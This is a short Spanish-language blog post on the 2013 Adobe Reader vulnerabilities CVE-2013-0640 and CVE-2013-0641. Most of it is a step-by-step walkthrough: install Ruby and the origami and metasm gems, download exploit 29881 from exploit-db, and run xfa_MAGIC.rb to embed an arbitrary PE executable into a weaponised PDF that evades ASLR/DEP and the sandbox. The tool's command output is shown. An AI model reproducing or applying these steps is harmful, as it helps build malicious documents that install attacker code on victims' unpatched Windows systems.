La vulnerabilidad fue descubierta por la firma de seguridad FireEye.
El bug permite a un atacante aprovechar una falla en versiones antiguas
de Adobe Reader, y escalar el acceso al sistema operativo para instalar
su propio código. Quienes estén usando la versión más reciente de Adobe
Reader no son vulnerables al ataque.
Las dos vulnerabilidades ya tienen su CVE asignado (CVE-2013-0640 y CVE-2013-0641) y @w3bd3vil y @abh1sek han rescatado de un foro ruso y adaptado un exploit que es capaz de evadir ASLR/DEP y el sandbox de la aplicación.
Afecta a las versiones 11.0.1, 11.0.0, 10.1.5, 10.1.4, 10.1.3, 10.1.2, 10.1 y 9.5 de Adobe Acrobat Reader y funciona bajo Windows 7 (32 y 64bit) y XP.
Para probarlo nada más sencillo. Primero necesitamos instalar Ruby 1.9 y las gemas origami y metasm:
D:\Ruby193\bin\gem.bat install metasm
D:\Ruby193\bin\gem.bat install origami -v "=1.2.5"
Luego descargamos el exploit (http://www.exploit-db.com/sploits/29881.tar.gz) y lo descomprimimos, lo desempaquetamos y echamos un vistazo a sus parámetros y uso:
D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb
Usage: xfa_MAGIC.rb [options]
-i, --input [FILE] Input PDF. If provided, exploit will be injected into it (optional)
-p, --payload [FILE] PE executable to embed in the payload
--low-mem Use Heap spray suitable for low memory environment
-o, --output [FILE] File path to write output PDF
-h, --help Show help
Después simplemente seleccionamos nuestro ejecutable PE para el payload (máximo 114688 bytes) y el nombre del fichero PDF:
D:\Hacking\Exploits\29881>d:\Ruby193\bin\ruby.exe xfa_MAGIC.rb -p prueba.exe -o poc.pdf
[+] Loading package
[+] Embedding user executable (size: 18944)
[+] Encoding payload (key: 249 kii: 251)
[+] Generating file: poc.pdfFuentes:
[+] http://www.exploit-db.com/
[+] http://www.hackplayers.com/
[+] http://www.fayerwayer.com/
Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.
0 Notaciones:
Publicar un comentario